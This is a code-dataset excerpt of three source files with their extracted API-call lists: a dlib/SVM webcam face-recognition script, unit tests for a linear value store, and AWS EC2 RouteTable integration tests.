# have a maximum width of 400 pixels, and convert it to
# grayscale
#frame = vs.read()
#frame = imutils.resize(frame, width=400)
ret, frame = video_capture.read()
#dim = (int(frame.shape[1] * 0.25), int(frame.shape[0] * 0.25))
dim = (int(frame.shape[1] * 0.2), int(frame.shape[0] * 0.2))
small_frame = cv2.resize(frame, dim)
gray_one_channel = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)
#face_locations = face_recognition.face_locations(small_frame)
gray = cv2.cvtColor(gray_one_channel, cv2.COLOR_GRAY2RGB)
# detect faces in the grayscale frame
rects = detector(gray, 1)
#print("rects:"+str(rects))
for rect in rects:
#print("rect:"+str(rect))
css = [rect.top(), rect.right(), rect.bottom(), rect.left()]
location = max(css[0], 0), min(css[1], gray.shape[1]), min(css[2], gray.shape[0]), max(css[3], 0)
face_location = dlib.rectangle(location[3], location[0], location[1], location[2])
face_locations.append(face_location)
raw_list.append(css)
shape = predictor(gray, face_location)
face_encoding = face_encoder.compute_face_descriptor(gray, shape, 1)
#print("random:"+str(face_encoding))
"""
match_chris = []
match_julie = []
chris_norm = 0
julie_norm = 0
if len([chris_face_encoding]) == 0:
match_chris = list(0<=0.6)
else:
chris_norm = np.linalg.norm(np.array([chris_face_encoding]) - np.array([face_encoding]), axis=1)
match_chris = list(chris_norm<= 0.6)
print("chris:"+str(chris_norm))
name = "Unknown"
if len([julie_face_encoding]) == 0:
match_julie = list(0<=0.6)
else:
julie_norm = np.linalg.norm(np.array([julie_face_encoding]) - np.array([face_encoding]), axis=1)
match_julie = list(julie_norm <= 0.6)
print("julie:"+str(julie_norm))
if match_chris[0]!=0 and match_julie[0]!=0:
if julie_norm>chris_norm:
name = "Chris"
else:
name = "Julie"
elif match_julie[0] == 0 and match_chris[0] !=0:
name = "Chris"
elif match_julie[0] != 0 and match_chris[0] ==0:
name = "Julie"
else:
name = "Unknown"
"""
threshold = -0.05 #-0.1 for C=0.1 4-8 6 for 0.3
proba = 0.72
clf = joblib.load(pathAttributes.SVM_model)
feeaturesArray = np.array(face_encoding)
ID = clf.predict(feeaturesArray.reshape(1,-1))[0]
name = result[str(ID)]
#scores = clf.decision_function(feeaturesArray.reshape(1,-1))
scores = clf.predict_proba(feeaturesArray.reshape(1,-1))
"""
scores_sorted = np.sort(scores)
second_biggest = scores_sorted[0][-2]
minimum = scores_sorted[0][0]
biggest_score = np.max(scores)
gap = biggest_score - minimum
gap_2 = biggest_score - second_biggest
print(gap_2)
percentage = gap_2/gap *100
print(percentage)
if percentage < 30:
name = "unknown"
""" """
biggest_score = np.max(scores)
if biggest_score < threshold:
name = "unknown"
"""
biggest_score = np.max(scores)
if biggest_score < proba:
name="unknown"
#scores = scores - np.min(scores)
#scores = scores/np.max(scores)
print(scores,name)
face_names.append(name)
#print(face_names)
for (top, right, bottom, left), name in zip(raw_list, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 5
right *= 5
bottom *= 5
left *= 5
# Draw a box around the faceq
cv2.rectangle(frame, (left-10, top-10), (right+10, bottom+10), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left-10, bottom+10), (right+10, bottom+45), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)
cv2.imshow('Video', frame) #display the camra
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
faceRecognition()
| [
"cv2.rectangle",
"dlib.face_recognition_model_v1",
"dlib.rectangle",
"sklearn.externals.joblib.load",
"dlib.shape_predictor",
"cv2.imshow",
"numpy.max",
"dlib.get_frontal_face_detector",
"numpy.array",
"cv2.putText",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.cvtColor",
"cv2.resize"... | [((1116, 1148), 'dlib.get_frontal_face_detector', 'dlib.get_frontal_face_detector', ([], {}), '()\n', (1146, 1148), False, 'import dlib\n'), ((1166, 1223), 'dlib.shape_predictor', 'dlib.shape_predictor', (['pathAttributes.face_detection_model'], {}), '(pathAttributes.face_detection_model)\n', (1186, 1223), False, 'import dlib\n'), ((1244, 1313), 'dlib.face_recognition_model_v1', 'dlib.face_recognition_model_v1', (['pathAttributes.face_recognition_model'], {}), '(pathAttributes.face_recognition_model)\n', (1274, 1313), False, 'import dlib\n'), ((1423, 1442), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1439, 1442), False, 'import cv2\n'), ((7424, 7447), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7445, 7447), False, 'import cv2\n'), ((2802, 2824), 'cv2.resize', 'cv2.resize', (['frame', 'dim'], {}), '(frame, dim)\n', (2812, 2824), False, 'import cv2\n'), ((2853, 2898), 'cv2.cvtColor', 'cv2.cvtColor', (['small_frame', 'cv2.COLOR_BGR2GRAY'], {}), '(small_frame, cv2.COLOR_BGR2GRAY)\n', (2865, 2898), False, 'import cv2\n'), ((2987, 3037), 'cv2.cvtColor', 'cv2.cvtColor', (['gray_one_channel', 'cv2.COLOR_GRAY2RGB'], {}), '(gray_one_channel, cv2.COLOR_GRAY2RGB)\n', (2999, 3037), False, 'import cv2\n'), ((7219, 7245), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (7229, 7245), False, 'import cv2\n'), ((3435, 3501), 'dlib.rectangle', 'dlib.rectangle', (['location[3]', 'location[0]', 'location[1]', 'location[2]'], {}), '(location[3], location[0], location[1], location[2])\n', (3449, 3501), False, 'import dlib\n'), ((5170, 5207), 'sklearn.externals.joblib.load', 'joblib.load', (['pathAttributes.SVM_model'], {}), '(pathAttributes.SVM_model)\n', (5181, 5207), False, 'from sklearn.externals import joblib\n'), ((5238, 5261), 'numpy.array', 'np.array', (['face_encoding'], {}), '(face_encoding)\n', (5246, 5261), True, 'import numpy as np\n'), ((6161, 6175), 'numpy.max', 'np.max', 
(['scores'], {}), '(scores)\n', (6167, 6175), True, 'import numpy as np\n'), ((6802, 6893), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left - 10, top - 10)', '(right + 10, bottom + 10)', '(0, 0, 255)', '(2)'], {}), '(frame, (left - 10, top - 10), (right + 10, bottom + 10), (0, \n 0, 255), 2)\n', (6815, 6893), False, 'import cv2\n'), ((6967, 7070), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left - 10, bottom + 10)', '(right + 10, bottom + 45)', '(0, 0, 255)', 'cv2.FILLED'], {}), '(frame, (left - 10, bottom + 10), (right + 10, bottom + 45), (\n 0, 0, 255), cv2.FILLED)\n', (6980, 7070), False, 'import cv2\n'), ((7123, 7199), 'cv2.putText', 'cv2.putText', (['frame', 'name', '(left, bottom + 30)', 'font', '(1.0)', '(255, 255, 255)', '(1)'], {}), '(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)\n', (7134, 7199), False, 'import cv2\n'), ((7330, 7344), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (7341, 7344), False, 'import cv2\n')] |
from gamegym.game import Game, Situation
from gamegym.utils import get_rng
from gamegym.distribution import Explicit
from gamegym.value_learning.valuestore import LinearValueStore
import numpy as np
import pytest
from scipy.sparse import csr_matrix
def test_init():
    """LinearValueStore accepts shape-only, values-only, or a consistent pair."""
    # Valid constructions: shape alone, a value array alone, and a value
    # array with a matching explicit shape.
    valid_cases = [
        ((), dict(shape=(3, 3))),
        ((np.zeros((4, 3)),), {}),
        ((np.zeros((4, 3)),), dict(shape=(4, 3))),
    ]
    for args, kwargs in valid_cases:
        LinearValueStore(*args, **kwargs)
    # Invalid constructions: a bare tuple where values are expected, and an
    # explicit shape contradicting the supplied array.
    invalid_cases = [
        (((3, 3),), {}),
        ((np.zeros((4, 3)),), dict(shape=(4, 4))),
    ]
    for args, kwargs in invalid_cases:
        with pytest.raises(Exception):
            LinearValueStore(*args, **kwargs)
def test_value_update():
    """get() is the dot product with stored weights; update() shifts weights by step * feature."""
    store = LinearValueStore(np.ones((4,)))
    feature = [0, 2, -1, 3]
    # all-ones weights: 1*0 + 1*2 + 1*(-1) + 1*3 == 4, for list and ndarray input alike
    assert store.get(feature) == pytest.approx(4.0)
    assert store.get(np.array(feature)) == pytest.approx(4.0)
    #assert store.get(csr_matrix(feature)) == pytest.approx(4.0)
    store.update(feature, -0.5)
    # weights become 1 + (-0.5) * feature, elementwise
    assert store.values == pytest.approx([1, 0, 1.5, -0.5])
    assert store.get(feature) == pytest.approx(-3.0)
def test_norm():
vs = LinearValueStore(shape=(2, 3), fix_mean=1.0)
| [
"pytest.approx",
"numpy.ones",
"gamegym.value_learning.valuestore.LinearValueStore",
"numpy.array",
"numpy.zeros",
"pytest.raises"
] | [((272, 302), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', ([], {'shape': '(3, 3)'}), '(shape=(3, 3))\n', (288, 302), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((590, 603), 'numpy.ones', 'np.ones', (['(4,)'], {}), '((4,))\n', (597, 603), True, 'import numpy as np\n'), ((614, 633), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', (['a'], {}), '(a)\n', (630, 633), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((960, 1004), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', ([], {'shape': '(2, 3)', 'fix_mean': '(1.0)'}), '(shape=(2, 3), fix_mean=1.0)\n', (976, 1004), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((324, 340), 'numpy.zeros', 'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (332, 340), True, 'import numpy as np\n'), ((363, 379), 'numpy.zeros', 'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (371, 379), True, 'import numpy as np\n'), ((404, 428), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (417, 428), False, 'import pytest\n'), ((438, 462), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', (['(3, 3)'], {}), '((3, 3))\n', (454, 462), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((472, 496), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (485, 496), False, 'import pytest\n'), ((680, 698), 'pytest.approx', 'pytest.approx', (['(4.0)'], {}), '(4.0)\n', (693, 698), False, 'import pytest\n'), ((733, 751), 'pytest.approx', 'pytest.approx', (['(4.0)'], {}), '(4.0)\n', (746, 751), False, 'import pytest\n'), ((855, 887), 'pytest.approx', 'pytest.approx', (['[1, 0, 1.5, -0.5]'], {}), '([1, 0, 1.5, -0.5])\n', (868, 887), False, 'import pytest\n'), ((912, 931), 'pytest.approx', 'pytest.approx', (['(-3.0)'], {}), '(-3.0)\n', (925, 931), False, 'import pytest\n'), ((523, 539), 'numpy.zeros', 
'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (531, 539), True, 'import numpy as np\n'), ((717, 728), 'numpy.array', 'np.array', (['f'], {}), '(f)\n', (725, 728), True, 'import numpy as np\n')] |
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the RouteTable API.
"""
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import get_bootstrap_resources
# Plural name of the RouteTable CRD, used to build custom-resource references.
RESOURCE_PLURAL = "routetables"
# Seconds to wait after a generic patch/update before re-reading state.
DEFAULT_WAIT_AFTER_SECONDS = 5
# Seconds to wait after creating a CR before checking EC2 state.
CREATE_WAIT_AFTER_SECONDS = 10
# Seconds to wait after deleting a CR before checking EC2 state.
DELETE_WAIT_AFTER_SECONDS = 10
def get_route_table(ec2_client, route_table_id: str) -> dict:
    """Fetch a single EC2 route table by ID.

    Returns the route table dict, or None when the describe call fails or
    no table matches the ID (failures are logged at debug level only).
    """
    filters = [{"Name": "route-table-id", "Values": [route_table_id]}]
    try:
        resp = ec2_client.describe_route_tables(Filters=filters)
    except Exception as e:
        logging.debug(e)
        return None
    tables = resp["RouteTables"]
    if not tables:
        return None
    return tables[0]
def route_table_exists(ec2_client, route_table_id: str) -> bool:
    """Return True when EC2 reports a route table with the given ID."""
    table = get_route_table(ec2_client, route_table_id)
    return table is not None
def get_routes(ec2_client, route_table_id: str) -> list:
    """Return the Routes list of the given route table.

    Returns None when the table cannot be found (or the describe call
    fails). Delegates to get_route_table() so the lookup and its error
    handling live in one place instead of being duplicated verbatim.
    """
    route_table = get_route_table(ec2_client, route_table_id)
    if route_table is None:
        return None
    return route_table["Routes"]
def route_exists(ec2_client, route_table_id: str, gateway_id: str, origin: str) -> bool:
    """Return True when the route table contains a route with the given gateway and origin."""
    routes = get_routes(ec2_client, route_table_id)
    # get_routes() returns None when the table is missing; the original
    # code iterated it unconditionally and raised TypeError in that case.
    if not routes:
        return False
    return any(
        route["Origin"] == origin and route["GatewayId"] == gateway_id
        for route in routes
    )
@service_marker
@pytest.mark.canary
class TestRouteTable:
    """End-to-end tests for the EC2 RouteTable custom resource.

    Each test drives the ACK controller through the Kubernetes API (acktest
    k8s helpers) and verifies the resulting state directly against EC2.
    """
    def test_create_delete(self, ec2_client):
        """Create a RouteTable CR, verify the EC2 table exists, delete the CR, verify removal."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-test", 24)
        # Reuse the shared bootstrap VPC and its internet gateway.
        test_vpc = get_bootstrap_resources().SharedTestVPC
        vpc_id = test_vpc.vpc_id
        igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
        test_cidr_block = "192.168.0.0/24"
        # Fill in the CR template placeholders for this test run.
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        test_resource_values["VPC_ID"] = vpc_id
        test_resource_values["IGW_ID"] = igw_id
        test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
        # Load Route Table CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create k8s resource
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        resource = k8s.get_resource(ref)
        resource_id = resource["status"]["routeTableID"]
        # Give EC2 time to realize the new table before querying it.
        time.sleep(CREATE_WAIT_AFTER_SECONDS)
        # Check Route Table exists
        assert route_table_exists(ec2_client, resource_id)
        # Delete k8s resource
        _, deleted = k8s.delete_custom_resource(ref)
        assert deleted is True
        time.sleep(DELETE_WAIT_AFTER_SECONDS)
        # Check Route Table doesn't exist
        exists = route_table_exists(ec2_client, resource_id)
        assert not exists
    def test_terminal_condition(self):
        """An invalid VPC ID must surface an ACK.Terminal condition carrying the EC2 error."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-fail", 24)
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        # Deliberately bogus VPC ID to force a terminal condition.
        test_resource_values["VPC_ID"] = "InvalidVpcId"
        # Load RouteTable CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create k8s resource
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        expected_msg = "InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist"
        terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
        # Example condition message:
        # InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist
        # status code: 400, request id: 5801fc80-67cf-465f-8b83-5e02d517d554
        # This check only verifies the error message; the request hash is irrelevant and therefore can be ignored.
        assert expected_msg in terminal_condition['message']
    def test_crud_route(self, ec2_client):
        """Exercise create/read/update/delete of routes inside a RouteTable CR."""
        test_resource_values = REPLACEMENT_VALUES.copy()
        resource_name = random_suffix_name("route-table-test", 24)
        test_vpc = get_bootstrap_resources().SharedTestVPC
        vpc_id = test_vpc.vpc_id
        igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
        test_cidr_block = "192.168.0.0/24"
        test_resource_values["ROUTE_TABLE_NAME"] = resource_name
        test_resource_values["VPC_ID"] = vpc_id
        test_resource_values["IGW_ID"] = igw_id
        test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
        # Load Route Table CR
        resource_data = load_ec2_resource(
            "route_table",
            additional_replacements=test_resource_values,
        )
        logging.debug(resource_data)
        # Create Route Table
        ref = k8s.CustomResourceReference(
            CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
            resource_name, namespace="default",
        )
        k8s.create_custom_resource(ref, resource_data)
        cr = k8s.wait_resource_consumed_by_controller(ref)
        assert cr is not None
        assert k8s.get_resource_exists(ref)
        resource = k8s.get_resource(ref)
        resource_id = resource["status"]["routeTableID"]
        time.sleep(CREATE_WAIT_AFTER_SECONDS)
        # Check Route Table exists
        assert route_table_exists(ec2_client, resource_id)
        # Check Routes exist (default and desired)
        routes = get_routes(ec2_client, resource_id)
        for route in routes:
            if route["GatewayId"] == "local":
                # Implicit "local" route EC2 creates with the table itself.
                default_cidr = route["DestinationCidrBlock"]
                assert route["Origin"] == "CreateRouteTable"
            elif route["GatewayId"] == igw_id:
                assert route["Origin"] == "CreateRoute"
            else:
                assert False
        # Update Route
        updated_cidr = "192.168.1.0/24"
        patch = {"spec": {"routes": [
                    {
                        #Default route cannot be changed
                        "destinationCIDRBlock": default_cidr,
                        "gatewayID": "local"
                    },
                    {
                        "destinationCIDRBlock": updated_cidr,
                        "gatewayID": igw_id
                    }
            ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        # assert patched state
        resource = k8s.get_resource(ref)
        assert len(resource['status']['routeStatuses']) == 2
        for route in resource['status']['routeStatuses']:
            if route["gatewayID"] == "local":
                assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
            elif route["gatewayID"] == igw_id:
                # origin and state are set server-side
                assert route_exists(ec2_client, resource_id, igw_id, "CreateRoute")
                assert route["state"] == "active"
            else:
                assert False
        # Delete Route
        patch = {"spec": {"routes": [
                    {
                        "destinationCIDRBlock": default_cidr,
                        "gatewayID": "local"
                    }
            ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        resource = k8s.get_resource(ref)
        assert len(resource['spec']['routes']) == 1
        for route in resource['spec']['routes']:
            if route["gatewayID"] == "local":
                assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
            else:
                assert False
        # Should not be able to delete default route
        patch = {"spec": {"routes": [
            ]
        }
        }
        _ = k8s.patch_custom_resource(ref, patch)
        time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
        expected_msg = "InvalidParameterValue: cannot remove local route"
        terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
        assert expected_msg in terminal_condition['message']
        # Delete Route Table
        _, deleted = k8s.delete_custom_resource(ref)
        assert deleted is True
        time.sleep(DELETE_WAIT_AFTER_SECONDS)
        # Check Route Table doesn't exist
        exists = route_table_exists(ec2_client, resource_id)
        assert not exists
"logging.debug",
"acktest.k8s.resource.get_resource_exists",
"acktest.k8s.resource.delete_custom_resource",
"acktest.k8s.resource.wait_resource_consumed_by_controller",
"acktest.k8s.resource.get_resource",
"acktest.k8s.resource.get_resource_condition",
"acktest.resources.random_suffix_name",
"time.sle... | [((2359, 2384), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (2382, 2384), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((2409, 2451), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-test"""', '(24)'], {}), "('route-table-test', 24)\n", (2427, 2451), False, 'from acktest.resources import random_suffix_name\n'), ((2960, 3038), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (2977, 3038), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((3082, 3110), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (3095, 3110), False, 'import logging\n'), ((3156, 3264), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (3183, 3264), True, 'from acktest.k8s import resource as k8s\n'), ((3304, 3350), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (3330, 3350), True, 'from acktest.k8s import resource as k8s\n'), ((3364, 3409), 'acktest.k8s.resource.wait_resource_consumed_by_controller', 'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (3404, 3409), True, 'from acktest.k8s import resource as k8s\n'), ((3456, 3484), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (3479, 3484), True, 'from acktest.k8s import resource as k8s\n'), ((3505, 3526), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (3521, 3526), True, 'from acktest.k8s import resource as k8s\n'), ((3593, 
3630), 'time.sleep', 'time.sleep', (['CREATE_WAIT_AFTER_SECONDS'], {}), '(CREATE_WAIT_AFTER_SECONDS)\n', (3603, 3630), False, 'import time\n'), ((3778, 3809), 'acktest.k8s.resource.delete_custom_resource', 'k8s.delete_custom_resource', (['ref'], {}), '(ref)\n', (3804, 3809), True, 'from acktest.k8s import resource as k8s\n'), ((3850, 3887), 'time.sleep', 'time.sleep', (['DELETE_WAIT_AFTER_SECONDS'], {}), '(DELETE_WAIT_AFTER_SECONDS)\n', (3860, 3887), False, 'import time\n'), ((4090, 4115), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (4113, 4115), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((4140, 4182), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-fail"""', '(24)'], {}), "('route-table-fail', 24)\n", (4158, 4182), False, 'from acktest.resources import random_suffix_name\n'), ((4358, 4436), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (4375, 4436), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((4480, 4508), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (4493, 4508), False, 'import logging\n'), ((4554, 4662), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (4581, 4662), True, 'from acktest.k8s import resource as k8s\n'), ((4702, 4748), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (4728, 4748), True, 'from acktest.k8s import resource as k8s\n'), ((4762, 4807), 'acktest.k8s.resource.wait_resource_consumed_by_controller', 
'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (4802, 4807), True, 'from acktest.k8s import resource as k8s\n'), ((4854, 4882), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (4877, 4882), True, 'from acktest.k8s import resource as k8s\n'), ((5002, 5049), 'acktest.k8s.resource.get_resource_condition', 'k8s.get_resource_condition', (['ref', '"""ACK.Terminal"""'], {}), "(ref, 'ACK.Terminal')\n", (5028, 5049), True, 'from acktest.k8s import resource as k8s\n'), ((5493, 5518), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (5516, 5518), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((5543, 5585), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-test"""', '(24)'], {}), "('route-table-test', 24)\n", (5561, 5585), False, 'from acktest.resources import random_suffix_name\n'), ((6094, 6172), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (6111, 6172), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((6216, 6244), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (6229, 6244), False, 'import logging\n'), ((6289, 6397), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (6316, 6397), True, 'from acktest.k8s import resource as k8s\n'), ((6437, 6483), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (6463, 6483), True, 'from acktest.k8s import resource as k8s\n'), ((6497, 6542), 
'acktest.k8s.resource.wait_resource_consumed_by_controller', 'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (6537, 6542), True, 'from acktest.k8s import resource as k8s\n'), ((6589, 6617), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (6612, 6617), True, 'from acktest.k8s import resource as k8s\n'), ((6638, 6659), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (6654, 6659), True, 'from acktest.k8s import resource as k8s\n'), ((6726, 6763), 'time.sleep', 'time.sleep', (['CREATE_WAIT_AFTER_SECONDS'], {}), '(CREATE_WAIT_AFTER_SECONDS)\n', (6736, 6763), False, 'import time\n'), ((7834, 7871), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (7859, 7871), True, 'from acktest.k8s import resource as k8s\n'), ((7880, 7918), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], {}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (7890, 7918), False, 'import time\n'), ((7970, 7991), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (7986, 7991), True, 'from acktest.k8s import resource as k8s\n'), ((8805, 8842), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (8830, 8842), True, 'from acktest.k8s import resource as k8s\n'), ((8851, 8889), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], {}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (8861, 8889), False, 'import time\n'), ((8910, 8931), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (8926, 8931), True, 'from acktest.k8s import resource as k8s\n'), ((9363, 9400), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (9388, 9400), True, 'from acktest.k8s import resource as k8s\n'), ((9409, 9447), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], 
{}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (9419, 9447), False, 'import time\n'), ((9552, 9599), 'acktest.k8s.resource.get_resource_condition', 'k8s.get_resource_condition', (['ref', '"""ACK.Terminal"""'], {}), "(ref, 'ACK.Terminal')\n", (9578, 9599), True, 'from acktest.k8s import resource as k8s\n'), ((9712, 9743), 'acktest.k8s.resource.delete_custom_resource', 'k8s.delete_custom_resource', (['ref'], {}), '(ref)\n', (9738, 9743), True, 'from acktest.k8s import resource as k8s\n'), ((9784, 9821), 'time.sleep', 'time.sleep', (['DELETE_WAIT_AFTER_SECONDS'], {}), '(DELETE_WAIT_AFTER_SECONDS)\n', (9794, 9821), False, 'import time\n'), ((1298, 1314), 'logging.debug', 'logging.debug', (['e'], {}), '(e)\n', (1311, 1314), False, 'import logging\n'), ((1800, 1816), 'logging.debug', 'logging.debug', (['e'], {}), '(e)\n', (1813, 1816), False, 'import logging\n'), ((2471, 2496), 'e2e.bootstrap_resources.get_bootstrap_resources', 'get_bootstrap_resources', ([], {}), '()\n', (2494, 2496), False, 'from e2e.bootstrap_resources import get_bootstrap_resources\n'), ((5605, 5630), 'e2e.bootstrap_resources.get_bootstrap_resources', 'get_bootstrap_resources', ([], {}), 